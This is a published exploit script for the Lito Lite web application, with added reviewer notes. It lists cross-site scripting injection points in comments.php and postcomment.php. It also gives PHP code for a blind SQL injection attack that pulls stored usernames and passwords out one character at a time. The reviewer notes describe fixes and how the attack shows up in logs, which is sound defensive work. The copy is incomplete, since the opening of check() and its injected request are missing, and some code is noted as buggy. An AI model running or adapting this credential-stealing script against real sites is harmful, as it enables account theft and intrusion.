#--+++===================================================================================+++--#
#--+++====== Lito Lite Multiple Cross Site Scripting / Blind SQL Injection Exploit ======+++--#
#--+++===================================================================================+++--#
# [+] XSS
# [+] comments.php?id=>[js code]
# [+] postcomment.php?id=>[js code]
#
# Reviewer notes:
# - XSS: the advisory reports that script content supplied in the `id` parameter of
#   comments.php and postcomment.php reaches the rendered page. The application-side
#   fix is to treat `id` as an integer on input and to encode anything derived from it
#   for its output context (htmlspecialchars() for HTML).
# - SQL injection: the script below recovers the "username" and "password" fields one
#   character at a time from a true/false difference in the response. The injected
#   request itself is not visible in this copy (see the note on check()), so the
#   affected parameter cannot be named from this page. The general fix is prepared
#   statements with bound parameters for every query that takes request input.
# - Detection: presumably one HTTP request is sent per candidate character (check()
#   takes a host and a path), so a run would appear in access logs as a long series of
#   near-identical requests from one client, differing by a position and a character.
# - This copy is incomplete: the opening PHP tag and the first part of check() are
#   missing after the shebang line, apparently lost when the page was extracted.
#!/usr/bin/php
// Tail of check(): only the end of a pattern match on $cont and the return logic survive.
// brute() calls it as check($host, $path, $fld, $pos, $char) and treats true as
// "the candidate character matched"; false is returned when the captured text is
// exactly two characters long.
(.+?)div>/", $cont, $x);
if (strlen ($x [1]) == 2) return false;
else return true;
}

// Builds the value of the field named by $fld by testing each character of $key at
// position $pos through check(), and returns the characters that matched.
// NOTE(review): $host and $path are accepted but not used; as published, the call
// passes fixed local test-install values instead.
// NOTE(review): $res is never initialised before the first `.=`.
function brute ($host, $path, $fld, $key) {
$pos = 1;
$chr = 0;
// The loop ends when a full pass over $key finds no match at the current position.
while ($chr < strlen ($key)) {
if (check ("localhost", "/xampp/lito_lite", $fld, $pos, $key [$chr])) {
$res .= $key [$chr];
// -1 plus the increment below restarts the candidate scan at index 0 for the next position.
$chr = -1;
$pos++;
}
$chr++;
}
return $res;
}

// Prints the banner and usage text, then terminates the script.
// NOTE(review): $argv is read here without a `global` declaration, so it is not the
// script's argument array inside this function.
function usage () {
echo "[+] Lito Lite Blind SQL Injection Exploit\n".
"[+] Author: darkjoker ~ http://darkjokerside.altervista.org ~ darkjoker93[at]gmail[dot]com\n".
"[+] Usage: php " . $argv [0] . " [key]\n".
"[+] Ex. php ". $argv [0] . " localhost /lito_lite abcdefghijklmnopqrstuvwxyz0123456789\n".
"[+] Greetz to athos, marco6\n";
exit ();
}

// Entry point: needs at least a host and a path argument; the third argument is optional.
if (count ($argv) < 3) usage ();
$host = $argv [1];
$path = $argv [2];
// Without a third argument the candidate alphabet is mixed-case letters and digits only,
// so field values containing any other character cannot be recovered in full.
if (empty ($argv [3])) $key = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789";
else $key = $argv [3];
// The two fields read are "username" and "password".
// NOTE(review): the page does not say how Lito Lite stores passwords; a salted
// password_hash() value would limit what a disclosure of this field exposes.
echo "[+] Username: " . brute ($host, $path, "username", $key) . "\n".
"[+] Password: " . brute ($host, $path, "password", $key) . "\n";
?>